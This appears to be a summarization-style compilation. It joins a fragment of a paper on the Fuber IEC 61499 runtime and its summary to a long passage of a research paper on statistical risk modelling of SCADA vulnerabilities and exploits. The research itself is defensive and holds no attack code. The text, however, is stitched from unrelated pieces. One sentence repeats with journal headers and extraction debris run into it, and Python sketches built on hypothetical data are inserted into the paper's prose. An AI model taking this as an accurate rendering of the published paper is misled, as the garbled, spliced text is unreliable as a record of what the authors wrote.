Current limitations of Fuber are that the algorithms must be implemented in Java and that composite data types for variables are not handled. At this point there is also no built-in support for distributing applications to multiple resources. There is currently no graphical user interface; instead Fuber is controlled by a command line interface. Also there is no support for ensuring timeliness of the executed applications, and no real-time aspects of the runtime environment were considered. Fuber is prepared to be able to update function block types and instances, as well as connections between function block instances, while the application is executing, making it easy to reconfigure the control software. It is however not yet possible to trigger the updates using an external Fuber interface. We are working on removing these limitations.
B. Implementation
In order to be able to develop a formal execution model, some implementation details of Fuber are introduced. The terminology in this section follows to a large extent the terminology as defined in the standard [8]. A UML class diagram [28] of the design of the function block scheduler in Fuber is shown in Fig. 5. The scheduler holds
Summary:
The execution model in a new standard for distributed control systems, IEC 61499, is analyzed. It is shown how the same standard compliant application running in two different standard compliant runtime environments may result in completely different behaviors. Thus, to achieve true portability of applications between multiple standard compliant runtime environments, a more detailed execution model is necessary. In this paper a new runtime environment, Fuber, is presented along with a formal execution model. In this case the execution model is given as a set of interacting state machines, which makes it straightforward to analyze the behavior of the application and runtime together using existing tools for formal verification.
|
Summarize:
Index Terms: Critical infrastructure, cybersecurity, industrial control systems (ICSs), Industrial IoT (IIoT), Internet of Things (IoT) security, risk, supervisory control and data acquisition (SCADA).
I. INTRODUCTION
A. Problem Statement
Cyberattacks can easily disable Industrial Internet of Things (IIoT) devices responsible for urban critical infrastructure. Urban critical infrastructure includes smart grids, water networks, and transportation systems. In 2015, multiple power substations in Ukraine were compromised, resulting in rolling power outages affecting 225,000 people [1]. Ukraine's supervisory control and data acquisition (SCADA) system that is responsible for controlling the smart grid's IIoT devices is vast and complicated, such that it will be impossible to patch all vulnerabilities throughout the networks. While there are vulnerability taxonomies and cybersecurity frameworks that may help to mitigate risk, these tools do not provide data-driven guidance about SCADA security research priorities or a dynamic model to evaluate risk based on various operating parameters. This paper provides a risk analysis of critical infrastructure SCADA vulnerabilities and exploits using statistical methods. Further, the study offers technical SCADA IIoT design recommendations to help mitigate future system exploit risk. Evaluating IIoT exploit risk is challenging.
Manuscript received January 23, 2018; revised March 11, 2018; accepted March 27, 2018. Date of publication April 6, 2018; date of current version January 16, 2019. This work was supported in part by Lockheed Martin and in part by CyberSecurity@CSAIL. (Corresponding author: Gregory Falco.) The authors are with the Computer Science and Artificial Intelligence Laboratory, Massachusetts Institute of Technology, Cambridge, MA 02139-4307 USA (e-mail: gfalco@mit.edu). Digital Object Identifier 10.1109/JIOT.2018.2822842
The problem is accentuated by the findings of various security researchers that the common vulnerability scoring system (CVSS) risk metrics, created by First.org and used by the Department of Homeland Security (DHS) and the National Institute of Standards and Technology (NIST), are not effective at predicting exploits [2], [3]. Further, NIST's cybersecurity framework, which is intended to help organizations evaluate cyber risk for industrial control systems (ICSs), faces adoption challenges and does not directly address exploit probability. Despite the framework being labeled as best-in-class, reasons for slow adoption include the considerable time and expense required to implement it [4]. SCADA and critical infrastructure vulnerability taxonomies exist that could help to identify cyber risk [5]-[7]. While these taxonomies could be useful, the findings are not grounded in data-driven, empirical analysis, which raises questions about their applicability to cyber risk in the field.
B. SCADA IIoT Overview
SCADA systems provide a supervisory control software layer across multiple programmable logic controllers (PLCs), which are a type of IIoT. SCADA systems are designed for use over long distances such as water or electric distribution. Because of these longer distances, there tends to be less control over the networks that use them. About 80% of U.S. utilities run on SCADA systems [8]. SCADA operates using telephony communication or other third-party networks, which reduces the speed, frequency, and quality of communications [9]. For this reason, SCADA tends to be event driven, meaning that data is only communicated from the devices to the software when there is a change in value [9]. To control other IIoT devices, SCADA systems require an operator console or human machine interface (HMI) from which an engineer can view, command, and control the devices connected to the system [10]. This HMI is also vulnerable to attack, where an attacker could intercept the PLCs' data and alter it on the
This HMI is also vulnerable to attack where an attacker could intercept the PLCs data and alter it on the This work is licensed under a Creative Commons Attribution 3.0 License. For more information, see http://creativecommons.org/licenses/by/3.0/ FALCO et al. : IIoT CYBERSECURITY RISK MODELING FOR SCADA SYSTEMS 4487 HMI [ 11]. SCADA systems typically runs on a commercial off-the-shelf Windows PC which can expose the software toan array of operating system, Windows-based attacks [ 12]. A growing challenge is that there is an increased interest in connecting SCADA-based IIoT systems to IT networks. Thiscan allow for hackers to access potentially vulnerable SCADA systems through backdoors using TCP/IP-based attacks. C. National Policy and Regulatory Landscape In 2013, Executive Order (EO) 13636: Improving Critical Infrastructure Cybersecurity was published. The EO encour- ages the adoption of cybersecurity best practices and mandated that the NIST develop new ways of assessing cybersecu- rity risk [ 13]. The EO falls short, however, because it is entirely voluntary and contains no incentive structures. Also,it puts the burden for taking action only on the shoulders of critical infrastructure operators [ 14]. While NIST created a strong cybersecurity framework which is hailed in industryas best-in-class the nancial burden of implementing NIST s framework is a serious barrier to adoption [ 4]. A less time- intensive, expensive and streamlined alternative to NIST srecommendations is needed for the SCADA community. Industry organizations like the North American Electric Reliability Corporation (NERC), have tried to step in [ 15]. For example, in 2008, NERC proposed critical infrastruc- ture protection reliability standards to the Federal Energy Regulatory Commission (FERC) to improve security for theelectric grid [ 16]. FERC has adopted these recommendations, mandating U.S. electric companies comply with all volun- tary cybersecurity regulation. 
Extensive survey results from NERC revealed that there are loopholes in the regulation. These enabled 75% of companies to opt out of cybersecurity regulation, while those companies that could not opt out preferred to pay fines rather than update their system security [17].

D. Vulnerability Identification and Classification

Vulnerability frameworks are useful tools that draw attention to specific categories of threats. Several frameworks for vulnerabilities exist today. The MITRE Corporation developed and maintains a database of common vulnerabilities and exposures (CVEs) to keep track of known software vulnerabilities. Each CVE has an associated risk score, created by First.org, called the CVSS. The CVSS base score is calculated using a complex formula that is primarily a function of an exploitability score and an impact score. NIST's National Vulnerability Database (NVD) cites each score (CVSS, impact, and exploitability) alongside each CVE. Findings by Allodi and Massacci [2] and Nayak et al. [3] indicated that existing security research metrics such as CVSS, exploitability, and impact scores for a vulnerability are not an indication of exploit for software. Previous studies focused on software vulnerabilities without considering whether there are certain subclasses of software where vulnerability risk metrics actually are effective at indicating exploitability. SCADA, as a subclass of software, should be investigated to understand the vulnerability metrics' relationship with exploits. Along with their database of CVEs, MITRE created a database of common weakness enumerations (CWEs) [18]. CWEs classify CVEs by type of vulnerability, resulting in a standardized and comprehensive list of cyber weakness classes. While CWEs provide a common language for how to define a vulnerability, they do not provide guidance on which CWEs are most relevant for certain classes of software, like SCADA systems, that are relevant to urban critical infrastructure.
From 2009 to 2011, MITRE and the SANS Institute created a prioritized list of CWEs called the CWE/SANS top 25 most dangerous software errors. The list aimed to identify the greatest software vulnerability types; however, it was nonspecific to a given class of software. The top 25 list used the common weakness scoring system (CWSS), which evaluates vulnerabilities by assessing three metric groups: the base finding metric group (captures the inherent risk of the weakness, confidence in the accuracy of the finding, and strength of controls), the attack surface metric group (assesses the barriers that an attacker must overcome in order to exploit the weakness), and the environmental metric group (evaluates the characteristics of the weakness that are specific to a particular environment or operational context) [19]. The principal weakness of the CWE/SANS prioritized list is that it fails to consider empirical evidence of exploits. A statistical prioritization would be more effective than a scoring prioritization such as the CWE/SANS top 25 because a data-driven study can account for the prevalence of exploits found in the wild. Typologies and taxonomies of critical infrastructure attack and vulnerability exist [6]. Two previous studies on critical infrastructure vulnerabilities focus on different domains: 1) Pak [6] focused on software attacks and 2) Grubesic and Matisziw [5] focused on nonsoftware vulnerabilities. These typologies are very useful for understanding the broad critical infrastructure landscape, but fall short as insightful resources for security professionals and researchers because neither is specific enough to provide actionable insight to managers, administrators, or policy makers. Also, neither specifically analyzes SCADA system security, which is essential to city-sustaining systems. Pak [6] listed types of general attacks he believes are most relevant to CI, such as distributed denial of service attacks, worms, and Trojan horses.
Pak [6] also made high-level organizational recommendations including strengthening information sharing practices among vulnerable CI sectors, publicly announcing vulnerabilities to ensure patching, and encouraging public/private collaboration to enhance security posture through training and education programs [6]. Further, he encourages continuous monitoring for open ports susceptible to attacks [6]. Pak's [6] recommendations lack specificity due to the breadth of cyber systems included in the standard critical infrastructure definition, which includes industries as diverse as the financial and energy sectors. Therefore, security professionals are unable to leverage this research to further fortify their infrastructure.

IEEE INTERNET OF THINGS JOURNAL, VOL. 5, NO. 6, DECEMBER 2018

Grubesic and Matisziw [5] addressed critical infrastructure vulnerability but do not discuss software vulnerabilities. They proposed that the following variables are essential to understanding CI vulnerability: condition and decay, capacity and use, obsolescence, interdependencies, location and network topology, disruptive threats, policy and political environment, and safeguards [5]. While their vulnerability typology is applicable to CI SCADA systems, their omission of software vulnerabilities deprives OT security engineers of concrete and actionable recommendations. A cyberattack taxonomy was developed by Zhu et al. [7] for SCADA systems. Zhu et al. [7] provided recommendations for control engineers such as: beware of false data injection, man-in-the-middle, and denial of service attacks. In addition to describing the types of attacks control engineers should be cognizant of, Zhu et al. [7] provided specific guidance in terms of hardware and software vulnerabilities for SCADA systems. The vulnerabilities they determined to be most critical for SCADA include: lack of privilege separation in embedded operating systems, buffer overflow, and SQL injection [7].
While these are concrete vulnerabilities that control engineers can seek out to secure across SCADA systems, it is unclear from Zhu et al.'s [7] analysis how they determined these attacks and vulnerabilities were most important for SCADA. The vulnerability list is supported by some examples of SCADA systems that have these vulnerabilities, but there is no data-driven evidence that these are the predominant risks for this class of ICS. Based on the existing literature, there is a need to understand the similarities and differences between SCADA and non-SCADA vulnerabilities and exploits. Also, the relationship between First.org's vulnerability risk metrics and the prevalence of exploits for the software subclass of SCADA systems should be investigated. Further, a data-driven vulnerability prioritization schema for SCADA that is customizable based on an organization's business parameters is needed to complement NIST's complex ICS cybersecurity framework.

II. OUR CONTRIBUTION

In this paper, we reaffirm other scholarly findings that the CVSS risk metrics are not correlated with exploits for all software vulnerabilities; however, unlike our research colleagues, we discover that CVSS risk metrics associated with the software subclass of SCADA systems are strongly correlated with exploit. We demonstrate that certain risk metrics are stronger indicators than others in evaluating the likelihood of exploits for SCADA systems. These metrics are used to generate a customizable prioritization schema for SCADA vulnerabilities. A schema can provide a focal point for security researchers to develop SCADA-specific solutions for the most critical vulnerabilities that extend beyond patching. Patching is not always feasible in the SCADA/IIoT environment because these systems must be running at all times and there is little guidance from SCADA vendors on the effect a patch might have on a SCADA system [20], [21].
The vulnerability prioritization schema can also complement NIST's cybersecurity framework for understanding ICS risk. Finally, by determining the prioritized exploit risk, we can make targeted SCADA IIoT software development recommendations for mitigating the associated vulnerabilities.

A. Experimental Findings

To evaluate the landscape of vulnerabilities, a database was collated from the DHS ICS Computer Emergency Response Team (ICS-CERT) and the MITRE Corporation's CVE systems. In total, 828 SCADA-relevant CVEs were found across the databases after accounting for duplicates and entries with insufficient information. These CVEs were then classified by their categorical vulnerability type, called a CWE, which is published by MITRE. This categorization enabled the calculation of a SCADA CWE density, which provides insight into the distribution of SCADA vulnerabilities across various CWEs. Risk metrics from NIST's NVD were collected for each CVE based on First.org's rating methodology. The average risk score across all CVEs in a given CWE was then calculated, which provided average risk metrics for each vulnerability type. Exploits were then Web-scraped from ExploitDB [22], CVEDetails [23], and the Metasploit [24] code database, yielding 52 exploits across 44 SCADA-related CVEs. These exploits were then categorized by their associated CWE, which allowed for the calculation of an exploit density per vulnerability type (CWE). A cosine similarity test was run on SCADA versus non-SCADA data to understand if there are differences in the distribution of vulnerabilities and exploits across the systems. The distributions of CWEs for SCADA and non-SCADA were found to be the same. However, the distributions of the types of vulnerabilities exploited were shown to be different despite the similar vulnerability profiles. This indicates the importance of the exploit density metric for SCADA CWEs.
Multivariate regression models were then run to evaluate the relationship between various SCADA risk metrics and exploit density. An R² value of 0.924, which is indicative of a strong correlation, was found. The independent variables regressed against the dependent variable, exploit density, included: CVE density (number of CVEs per CWE), average impact score per CWE, and average exploitability score per CWE. These variables were then used to develop the SCADA prioritization schema. The top CWEs by vulnerability density, exploit density, exploitability score, and impact score were assessed and combined to generate the prioritization schema. In summary, we make the following contributions in this paper.

1) SCADA is a unique software subclass with unique attack targets. We statistically validate that exploits for SCADA systems focus on penetrating a specific set of vulnerabilities as compared to non-SCADA systems.

2) First.org's CVSS risk metrics can be used to determine the risk of exploit for the software subclass of SCADA systems. Previously, studies concluded in blanket statements that First.org's exploitability and impact scores were not indicative of exploit risk. This finding provides grounds for substantial further work to evaluate the correlation of exploit and CVSS scores for other software subclasses.

3) SCADA vulnerabilities can be prioritized by data-driven risk metrics in a customizable schema. This has two benefits. First, security researchers could use this schema to understand the greatest SCADA vulnerability risk and orient their research to addressing these vulnerabilities. Second, a customizable schema provides flexibility to organizations and IIoT operators to adjust the vulnerability prioritization based on business parameters.

TABLE I: ICS-CERT versus MITRE SCADA vulnerabilities.
Additional variables can be incorporated into the schema, or weights can be applied, to tailor the prioritization to a given organization.

4) SCADA IIoT system developers can use the prioritization schema to easily identify the principal vulnerabilities based on exploit risk from this paper and take measures to design systems without these vulnerabilities in the future. We offer technical design recommendations for SCADA IIoT system software developers to mitigate the primary exploit risks we identify. Inherently accounting for these vulnerabilities during SCADA system design will dramatically reduce the potential attack surface for IIoT urban critical infrastructure operations.

III. METHODOLOGY

A. Data Collection

Data was first captured on vulnerabilities specific to SCADA systems. Data was collected from publicly available sources including ICS-CERT, MITRE's CVE and CWE databases, and NIST's NVD. The intention was not only to collate the specific vulnerabilities for SCADA, but also metadata about these vulnerabilities. The types of information collected included: CVE name and number, the associated CWE for each CVE, the CVSS base score for each CVE, the impact score for each CVE, and the exploitability score of each CVE. SCADA vulnerabilities were identified based on keywords in the description of each vulnerability across the databases. Keywords used included SCADA and Supervisory Control and Data Acquisition. Other variations of these keywords were also used to capture potential misspellings. There was an interesting discrepancy between ICS-CERT's cited SCADA vulnerabilities and MITRE's SCADA-related CVEs. As represented in Table I, ICS-CERT was missing 592 SCADA CVEs that were present in MITRE's database, whereas MITRE was missing 31 SCADA CVEs that were listed in ICS-CERT. This discrepancy could represent a lag between updates of the two databases, considering vulnerabilities are found more quickly than the databases can be updated [25].
However, it could also represent the lack of integration between the two databases, as they are independently curated. For purposes of this paper, a master list of SCADA CVEs was created by combining the two databases and removing overlapping SCADA CVEs. Throughout the course of data collection, other data irregularities were also discovered. Some of the CVEs for SCADA in the MITRE database failed to have CWEs associated with them. This could be due to the CVE being a nonclassified vulnerability type. As recently as CWE version 2.8 (as of May 2016, version 2.9 was released), man-in-the-middle vulnerabilities were not a classified CWE, yet version 2.9 has been updated to include this CWE. The CWE list is an ongoing project, and the absence of some CWEs is likely a function of this. For consistency of the dataset, all CVEs that lacked a CWE were not included in the analysis. While this could skew the results of the research and guide operators toward a specific CWE without accounting for non-CWE-classified vulnerabilities, there is an underlying assumption that if a CWE does not exist for a class of CVEs, it is not a popular vulnerability. This assumption was further supported by the fact that only 57 out of the 885 SCADA vulnerabilities did not have associated CWEs. Further manual analysis of the CVEs without CWEs confirmed that the CVEs were not all typologically related, thereby dismissing the possibility that a major type of future CWE is missing. After cleaning the dataset and reconciling the discrepancies across the ICS-CERT and MITRE vulnerability databases, the master list contained 828 SCADA-related vulnerabilities. After collecting all available SCADA vulnerability data, a similar process was conducted on non-SCADA vulnerabilities. The intention of collecting non-SCADA data is to evaluate the differences and similarities between the SCADA prioritization schema and a non-SCADA prioritization schema.
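The master-list construction described above (combining the two databases, removing overlapping CVEs, and excluding entries without an associated CWE) can be sketched as follows. This is a minimal illustration: the field names, CVE identifiers, and CWE assignments are hypothetical, not drawn from the actual ICS-CERT or MITRE data.

```python
# Hypothetical sketch of the master-list construction: merge the ICS-CERT
# and MITRE SCADA CVE sets, collapse duplicates, and drop entries that
# lack an associated CWE. All entries below are illustrative.

def build_master_list(ics_cert, mitre):
    """Merge two CVE dicts keyed by CVE id, keeping only CWE-classified entries."""
    merged = {**ics_cert, **mitre}  # overlapping CVE ids collapse to one entry
    return {cve: meta for cve, meta in merged.items() if meta.get("cwe")}

ics_cert = {
    "CVE-2015-0001": {"cwe": "CWE-119"},
    "CVE-2015-0002": {"cwe": None},        # no CWE -> excluded from analysis
}
mitre = {
    "CVE-2015-0001": {"cwe": "CWE-119"},   # duplicate of the ICS-CERT entry
    "CVE-2015-0003": {"cwe": "CWE-79"},
}

master = build_master_list(ics_cert, mitre)
print(sorted(master))  # ['CVE-2015-0001', 'CVE-2015-0003']
```

The same pattern extends to any number of source databases by folding each one into the merge.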
Considering the thousands of documented non-SCADA vulnerabilities, a random sample was selected from the MITRE CVE database (excluding all SCADA CVEs). The random sample contained an equal number of vulnerabilities to those in the SCADA master vulnerability list. Similar to the SCADA list, CVEs with missing metadata were removed from the dataset to preserve consistency. Once the master list of vulnerabilities was created, a similar list of exploits for the vulnerabilities was developed. A Web-scraper was developed to capture relevant exploits associated with each vulnerability. The Web-scraper pulled data from ExploitDB, CVEDetails, and the Metasploit code database. The intent of the collection was to search for all publicly available exploits that corresponded to the relevant CVEs on the master list (both SCADA and non-SCADA). While some CVEs did not have any publicly available exploits associated with them, others had multiple. In total, for the master CVE list, 44 SCADA CVEs were discovered to have 52 associated exploits (some CVEs had more than one exploit) and 103 total non-SCADA CVEs were found to have exploits. It is important to note that an inherent limitation of the research is the availability of publicly available information on both vulnerabilities and exploits. Similar to how MITRE contained vulnerabilities that ICS-CERT did not and vice versa, there are likely other sources of vulnerabilities for SCADA systems that were not captured. The same is true of exploits: the Web-scraper only pulled from a finite source of exploits. Exploits that appear on forums or on GitHub were not captured as part of this data collection process. Future work should include expanding the search for available exploits relevant to SCADA CVEs.

TABLE II: Top SCADA CWEs by density.
TABLE III: Top SCADA CWEs by exploit density.

B. Analysis

For purposes of this paper, vulnerability analysis was rolled up to the CWE level.
First, the vulnerability density of each CWE was calculated. This was done by dividing the total number of CVEs per CWE by the total number of vulnerabilities. For example, there were 202 CVEs in the CWE buffer overflow. This was divided by the total number of SCADA vulnerabilities, 828, to determine a CWE density of 24.40%. The density of SCADA CWEs is an indicator of how often these vulnerability types will be found in SCADA critical infrastructure and is important to establishing a prioritization schema. The top five CWEs by density are listed in Table II. While one class of CWE may have the highest density across a system type, it does not necessarily mean that there are exploits associated with these CWEs. Because of this, CWE density may not be what matters most to SCADA operators and security personnel. The density of CWE exploits could provide a better assessment of operational risk, considering the exploits are readily available for use by attackers. The same formula was applied to the exploits per CWE. For example, there were 32 exploits associated with CVEs in the CWE out-of-bounds read. This was divided by the total number of SCADA exploits, 52, to arrive at an exploit density of 61.54% for that CWE. The top five CWEs for exploit density are listed in Table III. An important observation is that CWE-200: information exposure is not listed among the top five CWEs for exploit density. This is likely because of the nature of the CWE. Information exposure is the act of an operator providing credentials to an unauthorized actor. It is a managerial exploit rather than a technical one that can be found in a public database, hence the reason it is not covered under the top CWEs for exploit density. Because of this, CWE-200 should still be considered a main concern for SCADA systems. To provide insight for security professionals into SCADA-specific risks, a comparison was made to non-SCADA vulnerability types and their associated exploits.
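The two density calculations above follow the same simple formula, which can be sketched directly using the counts the paper reports (202 of 828 CVEs for the top vulnerability-density CWE; 32 of 52 exploits for the top exploit-density CWE):

```python
# Sketch of the vulnerability-density and exploit-density calculations,
# using the counts given in the text.

def density(count_in_cwe, total):
    """Share of a CWE within the full set, as a percentage rounded to 2 places."""
    return round(100 * count_in_cwe / total, 2)

vuln_density = density(202, 828)     # CVEs in the CWE / all 828 SCADA CVEs
exploit_density = density(32, 52)    # exploits in the CWE / all 52 SCADA exploits

print(vuln_density)     # 24.4
print(exploit_density)  # 61.54
```

The same helper applies per CWE across the whole dataset, yielding the distributions compared in Tables II and III.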
Fig. 1: SCADA versus non-SCADA vulnerability density.

The intention is not to prove that SCADA is entirely different from IT system security, but to inform operators of the nuances of SCADA systems. Based on a side-by-side analysis of the density of CWEs, it is clear that SCADA security professionals should be looking for buffer overflow vulnerabilities, compared with non-SCADA systems, which are dominated by cross-site scripting. Fig. 1 illustrates these vulnerability densities, comparing SCADA and non-SCADA. A comparison of SCADA versus non-SCADA CWE exploit density reveals that SCADA operators should be most concerned with buffer overflow vulnerabilities (as they have the greatest risk of having exploits associated with them). This can be compared to non-SCADA systems, where the predominant CWE to have an exploit associated with it is SQL injection. The significance of these SCADA versus non-SCADA differences was evaluated by applying a cosine similarity test to the Web-scraped data. Cosine similarity measures how similar two nonzero vectors are to each other. A cosine similarity value close to 1 indicates a 0° separation between the two vectors (meaning the data sets are very similar). A cosine similarity close to 0 indicates a 90° separation between the two vectors, meaning the data sets are polarized. For purposes of this paper, we set a threshold: a cosine similarity greater than 0.5 (indicating a vector angle of 45° or less) is considered to indicate similar data sets, and less than 0.5 dissimilar data sets. The cosine similarity of the vulnerability density of SCADA compared with non-SCADA was 0.860. This indicates that the overall distributions of the vulnerability types of SCADA versus non-SCADA are very similar and the differences are not significant. However, the cosine similarity of the exploit density per CWE of SCADA compared with non-SCADA was 0.408.
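The similarity test above can be sketched in a few lines. The density vectors below are illustrative, not the paper's data; only the 0.5 threshold is taken from the text.

```python
# Pure-Python sketch of the cosine similarity test applied to two
# per-CWE density vectors. The vectors here are hypothetical.
import math

def cosine_similarity(a, b):
    """Cosine of the angle between two nonzero vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm

scada     = [0.24, 0.11, 0.08, 0.07, 0.05]   # hypothetical CWE densities
non_scada = [0.05, 0.21, 0.03, 0.18, 0.02]

sim = cosine_similarity(scada, non_scada)
print(sim > 0.5)  # True -> similar distributions; False -> dissimilar
```

Identical vectors yield a similarity of 1 (0° apart); orthogonal vectors yield 0 (90° apart), matching the interpretation given in the text.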
Considering the threshold set, we can affirm that the exploit landscape is different for SCADA versus non-SCADA in a significant way.

TABLE IV: Non-SCADA exploits versus CWE frequency, CVSS, impact score, and exploitability score.

This significance magnifies the importance of the CWE exploit density's role in SCADA-specific prioritization. It shows that despite consistent vulnerability distributions across SCADA and non-SCADA systems, attackers choose to create exploits for distinctly different vulnerabilities for SCADA systems compared to the exploits they create for non-SCADA systems. In addition to understanding the value of vulnerability and exploit density, the importance of the CVSS, impact score, and exploitability score for evaluating risk was sought for SCADA systems, considering Allodi and Massacci [2] determined these scores were not strong indicators of exploit for IT systems. To do this, regression analyses were performed on these variables to determine the likelihood that an exploit exists for a given CWE. Before investigating the SCADA relationship between exploit density and the First.org risk scores, Allodi and Massacci's [2] findings were verified by regressing the number of non-SCADA exploits on non-SCADA CWE frequency, CVSS, exploitability, and impact scores. Non-SCADA scores by First.org were indeed found to have no correlation with exploit density, with an adjusted R² value of 0.098. The results of the test can be found in Table IV. Moving forward to understand SCADA's relationship with these scores, a test was then performed to understand the relationship between the number of SCADA exploits and the SCADA CVSS scores. The hypothesis was that the higher the average CVSS score was for a set of CVEs in a CWE, the more likely there would be exploits associated with the CWE.
As a reminder, CVSS scores are metrics of risk evaluated based on factors including the impact and exploitability scores for a CVE. However, the CVSS score is not an average or sum of the impact and exploitability scores. First.org provides the equations for calculating the seemingly complex CVSS scores on their website, and they are replicated on NIST's NVD [26]. When conducting a linear regression of CVSS scores on exploits, it was surprising to find no correlation between CVSS scores and exploits, with an adjusted R² value of 0.074. This indicated that in our SCADA prioritization schema, CVSS scores should not be a factor in determining which CWEs should be prioritized. Next, a regression was run to determine if the number of vulnerabilities per CWE, the average impact score for CVEs related to a respective CWE, and the average exploitability score for CVEs related to a respective CWE were correlated with a CWE having exploits.

TABLE V: SCADA exploits versus CWE frequency, impact score, and exploitability score.

Similar to the assumption about the CVSS scores' relationship with the presence of exploits, the hypothesis was that a high number of vulnerabilities and high impact and exploitability scores were correlated with the existence of an exploit for a given CWE. In this case, the multiple regression model corroborated the hypothesis with an adjusted R² value of 0.924, showing a strong relationship between the presence of an exploit and the number of vulnerabilities for the given CWE, the average impact score, and the average exploitability score. The results of the analysis can be found in Table V. These results were surprising, as they indicate that there is something unique about the relationship of SCADA CWE frequency and exploitability and impact scores with exploit density that is not true of IT systems, as found by Allodi and Massacci [2].
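The multiple regression described above (exploit density regressed on CVE density, average impact score, and average exploitability score per CWE, reported as an adjusted R²) can be sketched as follows. The per-CWE rows below are illustrative placeholders, not the paper's data.

```python
# Illustrative sketch of the per-CWE multiple regression: ordinary least
# squares with an intercept, followed by the R^2 and adjusted R^2 the
# paper reports. The numbers are hypothetical.
import numpy as np

# Hypothetical per-CWE rows: [CVE density, avg impact score, avg exploitability score]
X = np.array([
    [24.4, 9.2, 8.6],
    [11.1, 7.8, 8.0],
    [ 8.3, 6.4, 7.1],
    [ 6.9, 9.0, 8.3],
    [ 5.2, 5.1, 6.0],
    [ 3.8, 4.9, 5.5],
])
y = np.array([61.5, 9.6, 7.7, 5.8, 3.8, 1.9])  # exploit density per CWE

X1 = np.column_stack([np.ones(len(X)), X])       # add intercept column
beta, *_ = np.linalg.lstsq(X1, y, rcond=None)    # OLS coefficients
resid = y - X1 @ beta
ss_res = resid @ resid
ss_tot = ((y - y.mean()) ** 2).sum()
r2 = 1 - ss_res / ss_tot
n, k = len(y), X.shape[1]
adj_r2 = 1 - (1 - r2) * (n - 1) / (n - k - 1)    # penalize for 3 regressors
print(round(r2, 3), round(adj_r2, 3))
```

The adjustment term penalizes R² for the number of regressors, which matters here because the number of CWEs (observations) is small relative to the three predictors.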
Further, this indicates that in First.org's complex equation that converts impact and exploitability scores to CVSS scores, the correlation with the presence of an exploit for a given CWE is lost. This could suggest that the CVSS score is a flawed indicator of risk, whereas the exploitability and impact scores are not (assuming risk can be assessed via the presence of an exploit, as per the suggestion of this paper). To further validate the assertion that CVSS scores do not correlate with the presence of an exploit, other multiple regressions were run, regressing exploits on variations of CVSS scores and other variables. All of these regressions consistently showed a weak relationship between exploits and CVSS scores, even when coupling CVSS scores with exploitability and impact scores. Based on this analysis, the magnitudes of the exploitability and impact scores for a given CWE are important. The top ten CWEs for impact and exploitability scores can be found in rank order in Table VI. It is interesting to note that while the top ten CWEs for impact and exploitability are not ranked the same, all top impact score CWEs are also found in the top exploitability score CWE list and vice versa.

C. Scoring

To develop a SCADA prioritization schema, the above analysis was used to evaluate which variables are most relevant to determining the SCADA IIoT risk. The variables of CWE density, CWE exploit density, and impact and exploitability scores were ultimately used. Additional variables can be included in a prioritization schema if data is available and the data is found to correlate with exploit density.

TABLE VI: Top ten SCADA CWEs by impact and exploitability scores.
Fig. 2: Prioritization schema steps.

While there are many options for determining how to score each variable for the prioritization order, for purposes of this paper a rudimentary system was intentionally selected for transparency.
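That rudimentary system, ranking the top five CWEs in each of the four equally weighted categories and awarding 5 points for first place down to 1 for fifth, can be sketched as follows. The CWE identifiers and per-category rankings below are illustrative, not the paper's actual tables.

```python
# Sketch of the rank-based point allocation: within each category the
# top-ranked CWE gets 5 points down to 1 for fifth place, and points are
# summed across the four equally weighted categories. Rankings are
# hypothetical placeholders.
from collections import Counter

rankings = {
    "vuln_density":    ["CWE-119", "CWE-20", "CWE-200", "CWE-22", "CWE-79"],
    "exploit_density": ["CWE-119", "CWE-20", "CWE-22", "CWE-89", "CWE-79"],
    "impact":          ["CWE-119", "CWE-89", "CWE-20", "CWE-200", "CWE-22"],
    "exploitability":  ["CWE-20", "CWE-119", "CWE-22", "CWE-200", "CWE-79"],
}

scores = Counter()
for top_five in rankings.values():
    for rank, cwe in enumerate(top_five):
        scores[cwe] += 5 - rank  # 5 points for first place, 1 for fifth

print(scores.most_common(3))  # [('CWE-119', 19), ('CWE-20', 16), ('CWE-22', 9)]
```

Per-category weights or extra categories can be added by multiplying each category's points before summing, which is the customization the paper leaves to individual organizations.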
More sophisticated weight-based prioritization schemes can be created and customized for various organizations. The purpose of this paper is not necessarily to generate the correct or ultimate prioritization order for SCADA system vulnerabilities; rather, it is to establish a framework for how a data-driven study can be used to develop customized SCADA risk prioritization schemes. Future work is encouraged to address how to weight each variable for the prioritization schema. Point values were assigned based on the ranked position of the CWE in each category. Each category (i.e., CWE density, CWE exploit density, etc.) was weighted equally. For purposes of this analysis, the top five CWEs from each category were ranked, where the top-ranked CWE receives a point value of 5 and the fifth CWE in the ranking receives a value of 1. The top five ranked CWEs for all four categories can be found in Table VII, and the total allocated points per CWE can be found in Table VIII. Fig. 2 represents the steps required to generate the prioritization schema, including the inputs and outputs of the model.

TABLE VII: Top five ranked CWEs per category.
TABLE VIII: Total scores for top-ranked CWEs.

This prioritization schema for SCADA vulnerabilities logically makes sense based on the characteristics of SCADA operations. A closer look at the top three prioritized SCADA vulnerability types helps illustrate this. Buffer overflows are defined as a vulnerability where software can read or write to a memory location that is outside the intended boundary of the memory buffer. It is not surprising that buffer overflows warrant the highest priority for SCADA vulnerabilities, as buffer overflows are inherent in older, low-level programming languages such as C, which is common to SCADA. Further, SCADA devices are rarely rebooted due to their constant operating requirements. Systems that have not been rebooted for years will accumulate memory fragmentation.
This makes devices substantially more vulnerable to buffer overflow vulnerabilities [7]. Improper input validation is when software does not check input, which enables an attacker to enter values that could cause control flow changes that are not expected by an operator. Considering one of the key differentiators of ICS versus IT systems is that ICSs are deterministic, this vulnerability is clearly a threat [9]. SCADA systems require low jitter, and any disruption of the deterministic processes, such as an attack exploiting the vulnerability class of improper input validation, would severely impact operations. Finally, information exposure is the disclosure of information to an unauthorized person. This vulnerability type is also logical for SCADA considering the prevalence of default usernames and passwords used across systems [7]. Because default usernames and passwords are frequently used, attackers can easily obtain this information from an instruction manual or from a vendor discussion forum. Also, information exposure as a prioritized exploit is logical considering the prevalence of phishing attacks used to collect credentials from critical infrastructure operators. This was seen in the Ukrainian electric grid cyberattack and UglyGorilla's cyber espionage program against 23 U.S. natural gas pipelines [1], [27]. While information exposure is a borderline priority with path traversal, it is important to remember that information exposure lacked technical exploits publicly available in the databases searched because it is more of a managerial exploit than a technical one. Therefore, it was not appropriately captured in the exploit density data set, and it indeed belongs at the top of the list.

IV. RESEARCH IMPLICATIONS

A. Operator Implications

This paper, while niche to a subsector of IIoT, can have considerable impact for urban critical infrastructure security.
